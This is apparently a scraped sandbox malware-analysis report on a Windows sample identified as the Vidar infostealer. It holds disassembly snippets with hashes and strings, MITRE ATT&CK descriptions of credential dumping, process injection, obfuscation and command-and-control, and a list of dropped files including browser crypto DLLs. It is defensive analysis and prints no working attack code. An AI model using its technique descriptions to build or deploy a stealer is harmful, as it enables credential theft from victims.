Source File: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: GetXStateFeaturesMask$InitializeCriticalSectionEx
API String ID: 0-4196971266
Opcode ID: 64a3ffac0646a5e915f2c1547a9a85328207a0585cb4fa66bfe6f5cc46d3ae92
Instruction ID: 7a2a1db9852bf7a88db1819853205662d31b93324c921bef2bb18bea61f164f4
Opcode Fuzzy Hash: 64a3ffac0646a5e915f2c1547a9a85328207a0585cb4fa66bfe6f5cc46d3ae92
Instruction Fuzzy Hash: EB01F73658012877CB11AA91EC05ECE3F16EB40BB1F894021FEDD2B214DA725831D6C0

Uniqueness

Uniqueness Score: -1.00%

Function 19A8F740 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';, xrefs: 19A8F752

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';
API String ID: 0-2071071404
Opcode ID: 84bc5ee7bc4a0aa617ffb413582c91b945ff425af06be27c86ddedafe0a16d60
Instruction ID: 75b38e4aff8a79c2ffe242cea10081af6d7763be66c75497e9cb324d8db85813
Opcode Fuzzy Hash: 84bc5ee7bc4a0aa617ffb413582c91b945ff425af06be27c86ddedafe0a16d60
Instruction Fuzzy Hash: 6711E775600175AFF2006738DCC9F6733ACEB40E06F484169FA4983184F760B80AC7A7

Uniqueness

Uniqueness Score: -1.00%

Function 19A95350 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

F, xrefs: 19A9539B

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: d9691979bf739a224fd5c598ffb1666e95503de741513daac18098321b3b5946
Instruction ID: 3082fbbbf0a3d74e4b5f2e65254026ff16ecc1fd2a0b2714fb01730d016e5a76
Opcode Fuzzy Hash: d9691979bf739a224fd5c598ffb1666e95503de741513daac18098321b3b5946
Instruction Fuzzy Hash: 1C1172B56083448FC704DF25C45175FB7E9BFD8614F88582EE88A87290E778E508CB93

Uniqueness

Uniqueness Score: -1.00%

Function 0040F580 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F596

Part of subcall function 0041FC60: std::exception::exception.LIBCMT ref: 0041FC75
Part of subcall function 0041FC60: __CxxThrowException@8.LIBCMT ref: 0041FC8A
Part of subcall function 0041FC60: std::exception::exception.LIBCMT ref: 0041FC9B

memmove.MSVCRT ref: 0040F5CF

Strings

invalid string position, xrefs: 0040F591

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
String ID: invalid string position
API String ID: 1659287814-1799206989
Opcode ID: bcf694971f287d0a7553bfea25672fbe8ca6af17fe9a7413021174007575ee50
Instruction ID: 53bf75527ab3bf274367aba823a209b8e3b66f0f9231be3ffe00ec12181ebe73
Opcode Fuzzy Hash: bcf694971f287d0a7553bfea25672fbe8ca6af17fe9a7413021174007575ee50
Instruction Fuzzy Hash: 5F01DB32310250ABD734CD6CED8095AB3EAEBD5710B24493FE185DBB82D674DC4A87D8

Uniqueness

Uniqueness Score: -1.00%

Function 19A6B224 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11COMMON

Download Yara Rule

Strings

misuse, xrefs: 19A6B233
%s at line %d of [%.10s], xrefs: 19A6B238

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$misuse
API String ID: 0-2530468415
Opcode ID: e3577e513bb46af9ea195778f4cd645e2cca47c80f75f211424a54c456966ace
Instruction ID: 34533d1e277bd0d2ef8956cc480c8d566610682d7d2cde774fedcb7405f19daf
Opcode Fuzzy Hash: e3577e513bb46af9ea195778f4cd645e2cca47c80f75f211424a54c456966ace
Instruction Fuzzy Hash: 55C01262584348E6C704EA54BC42DD927209FD0F58F9A81A9AB691D186E620916C4261

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AAKJEGCF

C:\ProgramData\CBAFIDAE

C:\ProgramData\DAAAKFHIEGDGCAAAEGDG

C:\ProgramData\GIJEBKECBAKFBGDGCBGDBAECAK

C:\ProgramData\HCBFIJJE

C:\ProgramData\HCFBAFIDAECA\freebl3.dll

C:\ProgramData\HCFBAFIDAECA\mozglue.dll

C:\ProgramData\HCFBAFIDAECA\msvcp140.dll

C:\ProgramData\HCFBAFIDAECA\nss3.dll

C:\ProgramData\HCFBAFIDAECA\softokn3.dll

C:\ProgramData\HCFBAFIDAECA\vcruntime140.dll

C:\ProgramData\KJJECGHJ

Windows Analysis Report
file.exe

Function 008E5EAF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Function 008F3416 Relevance: 8.1, APIs: 3, Strings: 1, Instructions: 1058
sleepmemoryCOMMON

Function 008E72D2 Relevance: 7.7, APIs: 5, Instructions: 202
COMMON

Function 008DDE3B Relevance: 4.6, APIs: 3, Instructions: 51
threadCOMMON

Function 008D4590 Relevance: 4.5, APIs: 3, Instructions: 33
threadCOMMON

Function 008DDD94 Relevance: 4.5, APIs: 3, Instructions: 30
threadCOMMON

Function 008E136F Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre